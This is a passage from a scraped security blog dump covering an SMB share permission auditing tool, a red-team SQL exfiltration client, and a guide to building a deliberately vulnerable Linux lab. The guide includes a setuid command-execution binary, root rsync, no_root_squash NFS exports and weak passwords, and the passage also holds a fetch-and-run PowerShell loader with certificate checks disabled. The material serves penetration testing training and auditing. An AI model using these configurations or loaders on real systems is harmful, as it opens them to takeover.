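# that may map to a specific application rollout or business process.
Get-SmbShare | Where-Object { $_.Path } |
    ForEach-Object { Get-Item -Path $_.Path -ErrorAction SilentlyContinue } |
    Group-Object { $_.CreationTime.ToString('yyyy-MM') } |
    Sort-Object Name | Select-Object Name, Count
```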

Who created them? 

  • Folder Owner: The folder owner can sometimes lead you to the department or business unit that owns the system, application, or process that created/uses the share.
  • Hostname: Hostname can indicate location and ownership if standardized naming conventions are used. 

Where are they? 

  • Computer Name: The name of the computer hosting the share can often tell you a lot, such as department and location, if a standardized naming convention is used.
  • IP Address: Similar to computer names, subnets are also commonly allocated to computers that do specific things. In many environments, that allocation is documented in Active Directory and can be cross referenced. 

If we collect all of that information during discovery, we can use it to perform grouping based on share name, owner, subnet, folder list, and folder list hash so we can identify large chunks of related shares that can be remediated at once. Don’t want to write the code for that yourself? I wrote PowerHuntShares to help you out.

Introducing PowerHuntShares 

PowerHuntShares is designed to automatically inventory, analyze, and report excessive privilege assigned to SMB shares on Active Directory domain joined computers. It is intended to be used by IAM and other security teams to gain a better understanding of their SMB Share attack surface and provide data insights to help group and prioritize share remediation efforts. Below is a quick guide to PowerHuntShares setup, execution (collection & analysis), and reporting. 

Setup 

1. Download the project from https://github.com/NetSPI/Powerhuntshares.

2. From a non-domain system you can load it with the following command:

runas /netonly /user:domain\user PowerShell.exe 
Set-ExecutionPolicy bypass -scope process
Import-Module Invoke-HuntSMBShares.ps1 

Alternatively, you can load it directly from the internet using the following PowerShell script. 

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} 

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerHuntShares/main/PowerHuntShares.psm1") 

Collection

The Invoke-HuntSMBShares collection function wraps a few modified functions from PowerView and Invoke-Parallel. The modifications grab additional information, automate common task sequences, and generate summary data for the reports. Regardless, a big shout out for the nice work done by Warren F. and Will Schroeder (however long ago). Below are some command examples. 

Run from domain joined system 
Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\temp\test
Run from a non-domain joined system
runas /netonly /user:domain\user PowerShell.exe
Invoke-HuntSMBShares -Threads 100 -RunSpaceTimeOut 10` 
-OutputDirectory c:\folder\`
-DomainController 10.1.1.1` 
-Credential domain\user
=============================================================== 
PowerHuntShares
=============================================================== 
 This function automates the following tasks:

 o Determine current computer's domain
 o Enumerate domain computers
 o Filter for computers that respond to ping requests
 o Filter for computers that have TCP 445 open and accessible
 o Enumerate SMB shares
 o Enumerate SMB share permissions
 o Identify shares with potentially excessive privileges
 o Identify shares that provide reads & write access
 o Identify shares that are high risk
 o Identify common share owners, names, & directory listings
 o Generate creation, last written, & last accessed timelines
 o Generate html summary report and detailed csv files

 Note: This can take hours to run in large environments.
---------------------------------------------------------------
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
---------------------------------------------------------------
SHARE DISCOVERY
--------------------------------------------------------------- 
[*][03/01/2021 09:35] Scan Start
[*][03/01/2021 09:35] Output Directory: c:\temp\smbshares\SmbShareHunt-03012021093504
[*][03/01/2021 09:35] Successful connection to domain controller: dc1.demo.local
[*][03/01/2021 09:35] Performing LDAP query for computers associated with the demo.local domain
[*][03/01/2021 09:35] - 245 computers found
[*][03/01/2021 09:35] Pinging 245 computers
[*][03/01/2021 09:35] - 55 computers responded to ping requests.
[*][03/01/2021 09:35] Checking if TCP Port 445 is open on 55 computers
[*][03/01/2021 09:36] - 49 computers have TCP port 445 open.
[*][03/01/2021 09:36] Getting a list of SMB shares from 49 computers
[*][03/01/2021 09:36] - 217 SMB shares were found.
[*][03/01/2021 09:36] Getting share permissions from 217 SMB shares
[*][03/01/2021 09:37] - 374 share permissions were enumerated.
[*][03/01/2021 09:37] Getting directory listings from 33 SMB shares
[*][03/01/2021 09:37] - Targeting up to 3 nested directory levels
[*][03/01/2021 09:37] - 563 files and folders were enumerated.
[*][03/01/2021 09:37] Identifying potentially excessive share permissions
[*][03/01/2021 09:37] - 33 potentially excessive privileges were found across 12 systems.
[*][03/01/2021 09:37] Scan Complete
--------------------------------------------------------------- 
SHARE ANALYSIS
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Analysis Start
[*][03/01/2021 09:37] - 14 shares can be read across 12 systems.
[*][03/01/2021 09:37] - 1 shares can be written to across 1 systems.
[*][03/01/2021 09:37] - 46 shares are considered non-default across 32 systems.
[*][03/01/2021 09:37] - 0 shares are considered high risk across 0 systems
[*][03/01/2021 09:37] - Identified top 5 owners of excessive shares.
[*][03/01/2021 09:37] - Identified top 5 share groups.
[*][03/01/2021 09:37] - Identified top 5 share names.
[*][03/01/2021 09:37] - Identified shares created in last 90 days.
[*][03/01/2021 09:37] - Identified shares accessed in last 90 days.
[*][03/01/2021 09:37] - Identified shares modified in last 90 days.
[*][03/01/2021 09:37] Analysis Complete
--------------------------------------------------------------- 
SHARE REPORT SUMMARY
--------------------------------------------------------------- 
[*][03/01/2021 09:37] Domain: demo.local
[*][03/01/2021 09:37] Start time: 03/01/2021 09:35:04
[*][03/01/2021 09:37] End time: 03/01/2021 09:37:27
[*][03/01/2021 09:37] Run time: 00:02:23.2759086
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] COMPUTER SUMMARY
[*][03/01/2021 09:37] - 245 domain computers found.
[*][03/01/2021 09:37] - 55 (22.45%) domain computers responded to ping.
[*][03/01/2021 09:37] - 49 (20.00%) domain computers had TCP port 445 accessible.
[*][03/01/2021 09:37] - 32 (13.06%) domain computers had shares that were non-default.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares with potentially excessive privileges.
[*][03/01/2021 09:37] - 12 (4.90%) domain computers had shares that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.41%) domain computers had shares that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) domain computers had shares that are HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE SUMMARY
[*][03/01/2021 09:37] - 217 shares were found. We expect a minimum of 98 shares
[*][03/01/2021 09:37]   because 49 systems had open ports and there are typically two default shares.
[*][03/01/2021 09:37] - 46 (21.20%) shares across 32 systems were non-default.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems are configured with 33 potentially excessive ACLs.
[*][03/01/2021 09:37] - 14 (6.45%) shares across 12 systems allowed READ access.
[*][03/01/2021 09:37] - 1 (0.46%) shares across 1 systems allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) shares across 0 systems are considered HIGH RISK.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] SHARE ACL SUMMARY
[*][03/01/2021 09:37] - 374 ACLs were found.
[*][03/01/2021 09:37] - 374 (100.00%) ACLs were associated with non-default shares.
[*][03/01/2021 09:37] - 33 (8.82%) ACLs were found to be potentially excessive.
[*][03/01/2021 09:37] - 32 (8.56%) ACLs were found that allowed READ access.
[*][03/01/2021 09:37] - 1 (0.27%) ACLs were found that allowed WRITE access.
[*][03/01/2021 09:37] - 0 (0.00%) ACLs were found that are associated with HIGH RISK share names.
[*][03/01/2021 09:37]
[*][03/01/2021 09:37] - The 5 most common share names are:
[*][03/01/2021 09:37] - 9 of 14 (64.29%) discovered shares are associated with the top 5 share names.
[*][03/01/2021 09:37]   - 4 backup
[*][03/01/2021 09:37]   - 2 ssms
[*][03/01/2021 09:37]   - 1 test2
[*][03/01/2021 09:37]   - 1 test1
[*][03/01/2021 09:37]   - 1 users
[*] ----------------------------------------------- 

Analysis

PowerHuntShares will inventory SMB share ACLs configured with "excessive privileges" and highlight "high risk" ACLs. Below is how those are defined in this context.

Excessive Privileges 

Excessive read and write share permissions have been defined as any network share ACL containing an explicit ACE (Access Control Entry) for the "Everyone", "Authenticated Users", "BUILTIN\Users", "Domain Users", or "Domain Computers" groups. Each of those groups effectively provides domain users with access to the affected shares due to privilege inheritance.

High Risk Shares 

In the context of this report, high-risk shares have been defined as shares that provide unauthorized remote access to a system or application. By default, that includes wwwroot, inetpub, c, and c$ shares. However, additional exposures may exist that are not called out beyond that.
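As a rough illustration of that name-based classification, a list of discovered share names can be screened for the default high-risk names with standard shell tools. The input file and share names below are hypothetical examples, not PowerHuntShares output; the tool performs this classification internally.

```shell
# Hypothetical share list; in practice this would come from your share inventory.
printf '%s\n' 'wwwroot' 'backup' 'c$' 'users' 'inetpub' > /tmp/share_names.txt

# Flag shares whose names match the default high-risk list (wwwroot, inetpub, c, c$).
grep -iE '^(wwwroot|inetpub|c|c\$)$' /tmp/share_names.txt
```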

Reporting

The script will produce an HTML summary report and detailed CSV data files.

HTML Report 

The HTML report should have links to all the content. Below is a quick screenshot of the dashboard. It includes summary data at the computer, share, and share ACL level. It also has a fun share creation timeline so you can identify those share creation clusters mentioned earlier. It was my first attempt at generating that type of HTML/CSS with PowerShell, so while it could be better, at least it is a functional first try. 😊 It also includes data grouping summaries in the “data insights” section. 
 
Note: The data displayed in the creation timeline chart seems to be trustworthy, but the last accessed/modified timeline charts seem to be a little less dependable. I believe it has something to do with how those timestamps are updated by the OS, but that is a research project for another day. 

A screenshot of the PowerHuntShares dashboard, including summary data at the computer, share, and share ACL level.
CSV Files

The Invoke-HuntSMBShares script will generate all kinds of .csv files, but the primary file of interest will be the “Inventory-Excessive-Privileges.csv” file. It should contain all the data discussed earlier in this blog and can be a good source of data for additional offline analysis.

A detailed screenshot of the Inventory-Excessive-Privileges.csv generated by the Invoke-HuntSMBShares script.

PowerShell can be used to import the .csv files and do additional analysis on the spot, which can be handy from both the blue and red team perspectives.
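For readers without PowerShell handy, the same kind of offline triage can be sketched with standard shell tools. The column names and sample rows below are illustrative assumptions for the demo, not the exact PowerHuntShares CSV schema.

```shell
# Build a tiny sample CSV (illustrative columns, not the real export schema).
cat > /tmp/shares.csv <<'EOF'
ComputerName,ShareName,FileSystemRights,IdentityReference
server1,backup,Write,Everyone
server2,ssms,Read,BUILTIN\Users
server3,test1,Write,Authenticated Users
EOF

# List computer/share pairs that allow write access.
awk -F',' 'NR > 1 && $3 == "Write" {print $1 "," $2}' /tmp/shares.csv
# -> server1,backup
# -> server3,test1
```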

A screenshot detailing how PowerShell can be used to import.csv files for additional analysis.

Wrap Up

This was a fun blog to write, and we covered a lot of ground, so below is a quick recap:

  • IAM and red teams can leverage Active Directory to help create an inventory of systems, shares, and share permissions.
  • Remediation efforts can be expedited through simple data grouping techniques if the correct information is collected when creating your share inventory.
  • The BUILTIN\Users group implicitly includes Domain Users (through a group inheritance chain) when a system is joined to an Active Directory domain.
  • Shares configured with excessive permissions can lead to RCE in various ways.
  • Windows event IDs can be used to identify authenticated scanning (540, 4624, 680, 4625) and share access (5140) happening in your environment.
  • PowerHuntShares is an open-source tool that can be used to get you started.

In the long term, my hope is to rewrite PowerHuntShares in C# to improve performance and remove some of the bugs. Hopefully, the information shared in this blog helped generate some awareness of the issues surrounding excessive permissions assigned to SMB shares in Active Directory environments. Or at least serves as a place to start digging into the solutions. 

Remember, share audits should be done on a regular cadence so you can identify and remediate high-risk share permissions before they become a threat. It is part of good IT and offensive security hygiene, just like penetration testing, adversary simulation, and red team operations.

For more on this topic, watch NetSPI’s webinar, How to Evaluate Active Directory SMB Shares at Scale.

Good luck and happy hunting!

[post_title] => Attacking and Remediating Excessive Network Share Permissions in Active Directory Environments [post_excerpt] => Learn how to quickly inventory, attack, and remediate network shares configured with excessive permissions assigned to SMB shares in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => network-share-permissions-powerhuntshares [to_ping] => [pinged] => [post_modified] => 2023-04-28 14:13:20 [post_modified_gmt] => 2023-04-28 19:13:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28175 [menu_order] => 226 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [15] => WP_Post Object ( [ID] => 28131 [post_author] => 53 [post_date] => 2022-08-04 10:26:57 [post_date_gmt] => 2022-08-04 15:26:57 [post_content] =>
Watch Now

Vulnerability management programs often fail to identify excessive network share permissions, which can be a major security issue. Excessive share permissions have become a risk for data exposure, ransomware attacks, and privilege escalation within enterprise environments.

In this discussion, NetSPI's Vice President of Research Scott Sutherland will talk about why these security issues exist. He will explain how to identify and manage excessive access to common network shares within Active Directory environments.

Join the conversation to see Scott’s latest open source project PowerHuntShares in action and to learn:

  • Common reasons why share permissions are configured with excessive privileges 
  • How to quickly inventory excessive share permissions across an entire Active Directory domain
  • How to efficiently triage those results to help reduce risk for your organization

https://youtu.be/TtwyQchCz6E

[post_title] => How to evaluate Active Directory SMB shares at scale [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evaluating-active-directory-smb-shares-at-scale [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:56:10 [post_modified_gmt] => 2023-08-22 14:56:10 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28131 [menu_order] => 36 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [16] => WP_Post Object ( [ID] => 28035 [post_author] => 17 [post_date] => 2022-07-01 12:19:00 [post_date_gmt] => 2022-07-01 17:19:00 [post_content] =>

On July 1, 2022, NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. Read the summary below or watch the video online.

+++

  • Many vendors promote 100% coverage, but most EDRs and MSSP vendors only provide 20% of that coverage.
  • Companies that partner with MSSP vendors must view their contracts carefully to understand what malicious activities vendors cover.
  • Companies are overdependent on Indicators of Compromise (IOCs) – provided and available in the community – but these tools should be part of a larger program, not the end of the program.
  • Detection starts with a framework like the popular MITRE ATT&CK framework.
  • Two challenges of building behavior-based threat detection: mapping technique coverage holistically and choosing which procedures to cover.
  • Review annual reports from threat detection companies to get a picture of the most common techniques and leverage your threat detection resources.
[post_title] => Help Net Security: The Challenges and Advantages of Building Behavior-based Threat Detection [post_excerpt] => NetSPI Senior Director Scott Sutherland was featured on Help Net Security where he discusses how, in order to stay ahead of malicious actors, organizations must shift their gaze to detect attackers before something bad happens. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => help-net-security-building-behavior-based-threat-detection [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:29 [post_modified_gmt] => 2023-01-23 21:10:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28035 [menu_order] => 237 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [17] => WP_Post Object ( [ID] => 25884 [post_author] => 53 [post_date] => 2021-07-12 15:36:48 [post_date_gmt] => 2021-07-12 20:36:48 [post_content] =>

Ransomware is a strategy for adversaries to make money – a strategy that’s proven successful. In this webinar, NetSPI’s Scott Sutherland and Alexander Polce Leary will cover how ransomware works, ransomware trends to watch, best practices for prevention, and more. At the core of the discussion, Scott and Alexander will explain how to build detections for common tactics, techniques, and procedures (TTPs) used by ransomware families and how to validate they work, ongoing, as part of the larger security program. Participants will leave this webinar with actionable advice to ensure their organization is more resilient to ever-evolving ransomware attacks.

[post_title] => How to Build and Validate Ransomware Attack Detections [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => build-validate-ransomware-attack-detections [to_ping] => [pinged] => [post_modified] => 2023-09-20 11:35:19 [post_modified_gmt] => 2023-09-20 16:35:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25884 [menu_order] => 51 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [18] => WP_Post Object ( [ID] => 19547 [post_author] => 53 [post_date] => 2020-08-04 11:37:01 [post_date_gmt] => 2020-08-04 16:37:01 [post_content] =>

Mainframes run the global economy and are at the heart of many of the world’s largest financial institutions. During this webinar, we will be interviewing our Mainframe security partner Chad Rikansrud from BMC. Chad will be discussing what mainframes are, how they can be a risk, and what companies can do to identify security holes before the bad guys do.

https://youtu.be/K0JNYXU-86w
[post_title] => Why zOS Mainframe Security Matters [post_excerpt] => Mainframes run the global economy and are at the heart of the many of the world’s largest financial organizations. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => why-zos-mainframe-security-matters [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:09:48 [post_modified_gmt] => 2023-09-01 12:09:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19547 [menu_order] => 69 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [19] => WP_Post Object ( [ID] => 19230 [post_author] => 53 [post_date] => 2020-06-02 13:49:41 [post_date_gmt] => 2020-06-02 13:49:41 [post_content] =>
Watch Now

Your employees were probably working from home more and more anyway, but the COVID-19 situation has taken work from home to a whole new level for many companies. Have you really considered all the security implications of moving to a remote workforce model?

Chances are you and others are more focused on just making sure people can work effectively and less focused on security. But in times of crisis, hackers are known to increase their efforts to take advantage of any weak links they can find in an organization’s infrastructure.

Host-based security represents a large surface of attack that continues to grow as employees become increasingly mobile and work from home more often. Join our webinar to make sure your vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce.

https://youtu.be/YMmK74ilyew

[post_title] => Host-Based Security: Staying Secure While Your Employees Work from Home [post_excerpt] => Watch this on-demand webinar to make sure you are vulnerability management program is covering the right bases to help mitigate some of the implicit risks associated with a remote workforce. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => host-based-security-staying-secure-while-your-employees-work-from-home-2 [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:12:05 [post_modified_gmt] => 2023-09-01 12:12:05 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19230 [menu_order] => 71 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [20] => WP_Post Object ( [ID] => 19772 [post_author] => 53 [post_date] => 2020-05-20 10:46:24 [post_date_gmt] => 2020-05-20 10:46:24 [post_content] =>

Watch the second webinar in our Lunch & Learn Series below!

Where there is Active Directory, there are SQL Servers. In dynamic enterprise environments, it’s common to see both platforms suffer from misconfigurations that lead to unauthorized system and sensitive data access. During this presentation, Scott covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. He also shares a msbuild.exe project file that can be used as an offensive SQL Client during red team engagements when tools like PowerUpSQL are too overt.

This presentation was originally developed for the Troopers20 conference, but due to the current travel constraints we’ll be sharing it online during this webinar.

https://youtu.be/Y0kD-xCZ3aI
[post_title] => SQL Server Hacking Tips for Active Directory Environments Webinar [post_excerpt] => During this presentation, NetSPI's Scott Sutherland covers common ways to target, exploit, and escalate domain privileges through SQL Servers in Active Directory environments. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => sql-server-hacking-tips-for-active-directory-environments-webinar [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:14:17 [post_modified_gmt] => 2023-09-01 12:14:17 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=19772 [menu_order] => 74 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [21] => WP_Post Object ( [ID] => 11555 [post_author] => 17 [post_date] => 2020-05-04 07:00:04 [post_date_gmt] => 2020-05-04 07:00:04 [post_content] =>
Esc Logo

Evil SQL Client (ESC) is an interactive .NET SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. While ESC can be a handy SQL Client for daily tasks, it was originally designed for targeting SQL Servers during penetration tests and red team engagements. The intent of the project is to provide an .exe, but also sample files for execution through mediums like msbuild and PowerShell.

This blog will provide a quick overview of the tool. For those who just want the code, it can be downloaded from https://github.com/NetSPI/ESC.

Why another SQL Server attack client?

PowerUpSQL and DAFT (a fantastic .NET port of PowerUpSQL written by Alexander Leary) are great toolsets, but during red team engagements they can be a little too visible. So to stay under the radar, we initially created a series of standalone .NET functions that could be executed via alternative mediums like msbuild inline tasks. Following that, a few clients asked us to exfiltrate data from their SQL Servers using similar evasion techniques, so we created the Evil SQL Client console to help make the testing process faster and the report screenshots easier to understand. :)

Summary of Executions Options

The Evil SQL Client console and functions can be run via:

  • Esc.exe is the original application, created in Visual Studio.
  • Esc.csproj is an msbuild script that loads .NET code directly through inline tasks. This technique was researched and popularized by Casey Smith (@subTee). There is a nice article on detection worth reading by Steve Cooper (@BleepSec) here.
  • Esc.xml is also an msbuild script that uses inline tasks, but it loads the actual esc.exe assembly through reflection. This technique was shared by @bohops in his GhostBuild project. It also leverages work done by @mattifestation.
  • Esc-example.ps1 is a PowerShell script that loads esc.exe through reflection. This specific script was generated using Out-CompressDll by @mattifestation.

Below is a simple screenshot of the Evil SQL Client console executed via esc.exe:

Start Esc Compile

Below is a simple screenshot of the Evil SQL Client console being executed through MSBuild:

Esc Msbuild

Summary of Features/Commands

At the moment, ESC does not have full feature parity with PowerUpSQL or DAFT, but the most useful bits are there. Below is a summary of the features that do exist.

Discovery            Access            Gather                  Escalate          Exfil
------------------   ---------------   ---------------------   ---------------   ------------
Discover file        Check access      Single instance query   Check loginaspw   Set File
Discover domainspn   Check defaultpw   Multi instance query    Check uncinject   Set FilePath
Discover broadcast   Show access       List serverinfo         Run oscmd         Set icmp
Show discovered      Export access     List databases                            Set icmpip
Export discovered                      List tables                               Set http
                                       List links                                Set httpurl
                                       List logins
                                       List rolemembers
                                       List privy

*All query results are exfiltrated via all enabled methods.

For more information on available commands visit: https://github.com/NetSPI/ESC/blob/master/README.md#supportedcommands

Wrap Up

Hopefully, the Evil SQL Client console will prove useful on engagements and help illustrate the need for a larger time investment in detective control development surrounding MSBuild inline task execution, SQL Server attacks, and basic data exfiltration.   For more information regarding the Evil SQL Client (ESC), please visit the github project.

Below are some additional links to get you started on building detections for common malicious Msbuild and SQL Server use:

Good luck and hack responsibly!

[post_title] => Evil SQL Client Console: Msbuild All the Things [post_excerpt] => Evil SQL Client (ESC) is an interactive .net SQL console client that supports enhanced SQL Server discovery, access, and data exfiltration capabilities. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => evil-sql-client-console-msbuild-all-the-things [to_ping] => [pinged] => [post_modified] => 2021-06-08 22:00:18 [post_modified_gmt] => 2021-06-08 22:00:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11555 [menu_order] => 500 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [22] => WP_Post Object ( [ID] => 18158 [post_author] => 53 [post_date] => 2020-04-07 10:18:04 [post_date_gmt] => 2020-04-07 15:18:04 [post_content] =>

During this webinar we’ll review how to create, import, export, and modify CLR assemblies in SQL Server with the goal of privilege escalation, OS command execution, and persistence. Scott will also share a few PowerUpSQL functions that can be used to execute the CLR attacks on a larger scale in Active Directory environments.

https://youtu.be/A_hZHwisRxc
[post_title] => Attacking SQL Server CLR Assemblies [post_excerpt] => Watch this on-demand webinar on Attacking SQL Server CLR Assemblies with NetSPI’s Scott Sutherland. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-sql-server-clr-assemblies [to_ping] => [pinged] => [post_modified] => 2023-09-01 07:15:41 [post_modified_gmt] => 2023-09-01 12:15:41 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=18158 [menu_order] => 76 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [23] => WP_Post Object ( [ID] => 11391 [post_author] => 17 [post_date] => 2020-03-27 07:00:57 [post_date_gmt] => 2020-03-27 07:00:57 [post_content] => This blog will share how to configure your own Linux server with the vulnerabilities shown in the "Linux Hacking Case Studies" blog series. That way you can practice building and breaking at home. Similar to the rest of the series, this blog is really intended for people who are new to penetration testing, but hopefully there is a little something for everyone. Enjoy! Below are links to the first four blogs in the series: Below is an overview of what will be covered in this blog:

Lab Scenarios

This section briefly summarizes the lab scenarios that you'll be building which are based on this blog series.
Scenario 1
  • Remote vulnerability: Excessive privileges configured on a Rsync server.
  • Local vulnerability: Excessive privileges configured on a Rsync server. Specifically, the server is configured to run as root.
  • Escalation path: Create a new privileged user by adding lines to the shadow, passwd, groups, and sudoers files.
Scenario 2
  • Remote vulnerability: Excessive privileges configured on an NFS export.
  • Local vulnerability: Insecure setuid binary that allows arbitrary code execution as root.
  • Escalation path: Review setuid binaries and determine which ones have the direct or indirect capability to execute arbitrary code as root.
Scenario 3
  • Remote vulnerability: Weak password configured for phpMyAdmin.
  • Local vulnerability: Excessive privileges configured on a script that is executed by a root cron job. Specifically, the script file is world writable.
  • Escalation path: Write a command to the world-writable script that starts a netcat listener. When the root cron job executes the script, the netcat listener will start as root; it is then possible to connect to the listener remotely to obtain root access. Reverse shell alternatives here.
Scenario 4
  • Remote vulnerability: Weak password configured for SSH.
  • Local vulnerability: Insecure sudoers configuration that allows arbitrary code execution as root through sudo applications.
  • Escalation path: Review sudo applications to determine which ones have the direct or indirect capability to execute arbitrary code as root. Examples include sh, vi, python, netcat, and the use of a custom nmap module.

Kali VM and Install Dependencies

For this lab, we'll be building our vulnerable services on a standard Kali image. If you don't already have a Kali VM, you can download one from the official Kali website. Once your Kali VM is ready to go, you'll want to install some packages that are required for setting up the scenarios in the lab. Make sure to sign in as root; you'll need those privileges to set up the lab. Install Required Packages
apt-get update
apt-get install nfs-kernel-server
apt-get install nfs-common
apt-get install ufw
apt-get install nmap
Clear Firewall Restrictions
iptables --flush
ufw allow from any to any
ufw status
With that out of the way, let's dive in.

Lab Setup: Rsync

Attack Lab: Linux Hacking Case Study Part 1: Rsync In this section we'll cover how to configure an insecure Rsync server. Once you're logged in as root, execute the commands below. Let's start by creating the rsyncd.conf configuration file:
echo "motd file = /etc/rsyncd.motd" > /etc/rsyncd.conf
echo "lock file = /var/run/rsync.lock" >> /etc/rsyncd.conf
echo "log file = /var/log/rsyncd.log" >> /etc/rsyncd.conf
echo "pid file = /var/run/rsyncd.pid" >> /etc/rsyncd.conf
echo " " >> /etc/rsyncd.conf
echo "[files]" >> /etc/rsyncd.conf
echo " path = /" >> /etc/rsyncd.conf
echo " comment = Remote file share." >> /etc/rsyncd.conf
echo " uid = 0" >> /etc/rsyncd.conf
echo " gid = 0" >> /etc/rsyncd.conf
echo " read only = no" >> /etc/rsyncd.conf
echo " list = yes" >> /etc/rsyncd.conf
Next, let's set up the rsync service:
systemctl enable rsync
systemctl start rsync
or
systemctl restart rsync
Verify the Configuration
rsync 127.0.0.1::
rsync 127.0.0.1::files

Lab Setup: NFS

Attack Lab: Linux Hacking Case Study Part 2: NFS In this section we'll cover how to configure insecure NFS exports and an insecure setuid binary. Once you're logged in as root, execute the commands below.

Configure NFS Exports

Create NFS Exports
echo "/home *(rw,sync,no_root_squash)" >> /etc/exports
echo "/ *(rw,sync,no_root_squash)" >> /etc/exports
Start NFS Server
systemctl start nfs-kernel-server.service
systemctl restart nfs-kernel-server
Verify NFS Export
showmount -e 127.0.0.1
Create Password Files for Discovery
echo "user2:test" > /root/user2.txt
echo "test:password" > /tmp/creds.txt
echo "test:test" > /tmp/mypassword.txt
Enable password authentication through SSH.
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config
service ssh restart

Create Insecure Setuid Binary

Create the source code for a binary that can execute arbitrary OS commands called exec.c (a quoted heredoc is used so the quotes and escapes in the C source survive intact):
cat << 'EOF' > /home/test/exec.c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>

int main(int argc, char *argv[]){

    printf("%s,%d\n", "USER ID:", getuid());
    printf("%s,%d\n", "EXEC ID:", geteuid());

    printf("Enter OS command:");
    char line[100];
    fgets(line, sizeof(line), stdin);
    line[strlen(line) - 1] = '\0';
    char *s = line;
    char *command[5];
    int i = 0;
    while(s){
        command[i] = strsep(&s, " ");
        i++;
    }
    command[i] = NULL;
    execvp(command[0], command);
}
EOF
Compile exec.c:
gcc -o /home/test/exec /home/test/exec.c
rm /home/test/exec.c
Configure setuid on exec so that we can execute commands as root:
chmod 4755 /home/test/exec
Verify that you can execute the exec binary as a least-privileged user.
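From the attacker's perspective in scenario 2, this lab binary would turn up while enumerating setuid binaries. A minimal sketch of that discovery step:

```shell
# Enumerate setuid binaries on the local filesystem (-perm -4000 matches the
# setuid bit). On the lab box, /home/test/exec should appear in the results
# alongside the OS defaults like /usr/bin/passwd.
find / -xdev -type f -perm -4000 2>/dev/null
```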

Lab Setup: phpMyAdmin

Attack Lab: Linux Hacking Case Study Part 3: phpMyAdmin In this section we'll cover how to configure an insecure instance of phpMyAdmin, a root cron job, and a world-writable script. Once you're logged in as root, execute the commands below.

Reset the root Password (this is mostly for existing MySQL instances)

We'll start by resetting the root password on the local MySQL instance. MySQL should be installed by default in Kali, but if it's not on your build, you'll have to install it first.
# Stop mysql
/etc/init.d/mysql stop

# Start MySQL in safe mode and log in as root
mysqld_safe --skip-grant-tables&
mysql -uroot

# Select the database to use
use mysql;

# Reset the root password
update user set password=PASSWORD("password") where User='root';
flush privileges;
quit

# Restart the server
/etc/init.d/mysql stop
/etc/init.d/mysql start

# Confirm update by logging in with new password
mysql -u root -p
exit

Install phpMyAdmin

Alrighty, time to install phpMyAdmin.
apt-get install phpmyadmin
Eventually you will be presented with a GUI. Follow the instructions below.
  1. Choose apache2 for the web server. Warning: When the first prompt appears, apache2 is highlighted, but not selected. If you do not hit Space to select Apache, the installer will not move the necessary files during installation. Hit Space, Tab, and then Enter to select Apache.
  2. Select yes when asked whether to use dbconfig-common to set up the database.
  3. You will be prompted for your database administrator's password, which should be set to "password" to match the lab.
After the installation we still have a few things to do. Let's create a soft link in the webroot to phpmyadmin.
ln -s /usr/share/phpmyadmin/ /var/www/phpmyadmin
